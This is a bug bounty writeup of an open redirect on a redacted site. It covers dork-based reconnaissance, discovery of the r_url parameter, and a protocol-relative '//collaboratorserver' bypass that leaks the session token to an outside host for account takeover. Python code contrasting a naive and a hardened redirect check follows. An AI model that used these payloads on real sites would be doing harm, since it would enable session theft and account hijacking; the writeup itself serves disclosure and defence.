This is an open redirect bug from a self-hosted bug bounty program that was worth $200.
- Combined Google Dork methods to find a fresh target nobody had touched yet (checking the disclosed reports on H1, Bugcrowd, etc. helps confirm that).
- Crawled the website for 10 minutes.
- Tried to find the user registration function on the website, but failed.
- Used Google Dork to find the register page:
site:redacted.com "register" OR "signup" OR "registration"
- Successfully registered an account.
- Time to check for hidden parameters on the login page.
- Used HTTP parameter discovery tools such as arjun, x8, and GAP to discover the r_url parameter.
- Tried an open redirect to another server, but it didn't work. It only accepts their own domain:
https://redacted.com/user/login?r_url=https://collaboratorserver - ERROR
- This can easily be bypassed with a protocol-relative URL (no scheme, so the check does not see it as an external host, but the browser still follows it off-site):
https://redacted.com/user/login?r_url=//collaboratorserver - OK
- After a successful login, the collaborator server receives an HTTP hit carrying the session token in the query string:
GET /?token=xxxxxxxxx HTTP/1.1
- Account takeover by setting the token as the cookie in the browser.
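The bypass above works because a check that only inspects absolute http(s) URLs treats a scheme-less "//host" as a relative path. The Python below is an added example, not code from the target or from this writeup: naive_is_safe_redirect is a constructed stand-in for the kind of check whose behaviour the two probes imply (it is an assumption about the target's logic, not its real code), and hardened_is_safe_redirect is one way to close the hole by accepting only a same-site, path-only target. redacted.com and collaboratorserver are the placeholders used in the writeup.

```python
from urllib.parse import urlsplit, urljoin

# Placeholder host taken from the writeup; the real target is redacted.
SITE_HOST = "redacted.com"


def naive_is_safe_redirect(target: str) -> bool:
    """Constructed stand-in for the check the writeup's behaviour implies.

    Absolute http(s) URLs must point at our own host; anything without a
    scheme is assumed to be a relative path and allowed. That assumption
    is the bug: "//collaboratorserver" has no scheme but is still an
    absolute, cross-origin URL to every browser.
    """
    if target.lower().startswith(("http://", "https://")):
        return urlsplit(target).hostname == SITE_HOST
    return True


def hardened_is_safe_redirect(target: str) -> bool:
    """Allow only a same-site, path-only redirect target.

    Rejects: any scheme ("https://x", "https:x", "javascript:..."),
    protocol-relative forms ("//x", "///x"), backslash variants that
    browsers normalise to slashes ("/\\x"), control characters, and
    anything that does not resolve back to SITE_HOST.
    """
    if not target or len(target) > 2048:
        return False
    if any(ord(ch) < 0x20 or ch == "\\" for ch in target):
        return False
    # Must be an absolute path with exactly one leading slash; this is
    # what stops "//host" and "///host" before any URL parser sees them.
    if target[0] != "/" or target[1:2] == "/":
        return False
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        return False
    # Defence in depth: resolve against our origin and confirm the host
    # is still ours once a URL parser has had its say.
    resolved = urlsplit(urljoin(f"https://{SITE_HOST}/", target))
    return resolved.scheme == "https" and resolved.hostname == SITE_HOST


def evaluate(target: str) -> tuple[bool, bool]:
    """Return (naive_verdict, hardened_verdict) for one redirect target."""
    return naive_is_safe_redirect(target), hardened_is_safe_redirect(target)


if __name__ == "__main__":
    # Constructed probes, including the two values from the writeup.
    for probe in (
        "/user/dashboard",
        "https://collaboratorserver",  # rejected by the site (ERROR)
        "//collaboratorserver",        # the bypass that worked (OK)
        "///collaboratorserver",
        "/\\collaboratorserver",
        "https:collaboratorserver",
        "javascript:alert(1)",
    ):
        naive, hardened = evaluate(probe)
        print(f"{probe!r:32} naive={naive!s:5} hardened={hardened}")
```

The hardened version deliberately also refuses "https://redacted.com/..." even though it is the site's own host: a path-only allowlist has a far smaller parsing surface than host comparison, and a login flow never needs to redirect to a full URL. If a full-URL form must be supported, parse it once, compare scheme and hostname exactly, and still reject backslashes and "//"-prefixed inputs.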